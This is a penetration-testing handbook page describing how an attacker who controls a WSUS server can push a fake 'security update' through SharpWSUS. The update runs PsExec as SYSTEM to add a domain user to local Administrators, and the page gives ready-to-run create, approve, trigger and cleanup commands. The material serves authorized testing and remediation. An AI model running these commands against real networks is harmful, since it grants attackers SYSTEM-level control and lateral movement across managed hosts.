Syslifters Handbook

English

Deutsch

English

Deutsch

Appearance

WSUS

When we already control the WSUS server (local admin on the WSUS host, or an account with WSUS Approver / Administrator role), the legitimate update channel becomes a lateral-movement primitive: we craft an "update" that runs an arbitrary Microsoft-signed binary with a command line of our choosing, approve it for a target computer group, and the targets execute the payload as NT AUTHORITY\SYSTEM on their next check-in.

For the related on-path / MitM scenario against an HTTP WSUS feed (no WSUS admin required), see Privilege escalation: WSUS.

Prerequisites

  • Admin (or equivalent WSUS role) on the WSUS server, or ability to reach the WSUS database (SUSDB).
  • The target hosts are configured to pull updates from this WSUS instance and approve on the targeted computer group.
  • A Microsoft-signed binary suitable as a payload (PsExec64.exe, BgInfo.exe, etc.) reachable from the WSUS server.

SharpWSUS

SharpWSUS talks to the local WSUS service to create, approve and clean up fake updates targeted at specific downstream clients.

cmd
:: Stage the fake update
SharpWSUS.exe create  /payload:"C:\Tools\PsExec64.exe" ^
                      /args:"/accepteula /s cmd.exe /c net localgroup Administrators <DOMAIN>\<user> /add" ^
                      /title:"Security Update KB5099999"

:: Approve it for a target group
SharpWSUS.exe approve /updateid:<GUID> /computername:<target-fqdn> /groupname:"Pentest"

:: Confirm the client picked it up
SharpWSUS.exe check   /updateid:<GUID> /computername:<target-fqdn>

:: Cleanup
SharpWSUS.exe delete  /updateid:<GUID> /computername:<target-fqdn> /groupname:"Pentest"

For non-English systems, target the well-known Administrators SID instead of the localised group name:

text
/accepteula /s cmd.exe /c "net localgroup S-1-5-32-544 <DOMAIN>\<user> /add"

To trigger the install immediately on the target (rather than waiting for the next scheduled poll), run from any shell on that host:

cmd
usoclient StartScan    :: Windows 10/11
wuauclt /detectnow     :: older Windows

Cleanup

  • Delete the approved update from the WSUS catalogue (SharpWSUS.exe delete ...).
  • Remove any local accounts / group memberships the payload created.
  • Document the WSUS admin path used (compromised account, weak ACL on SUSDB, etc.) so the remediation finding targets the root cause, not just the symptom.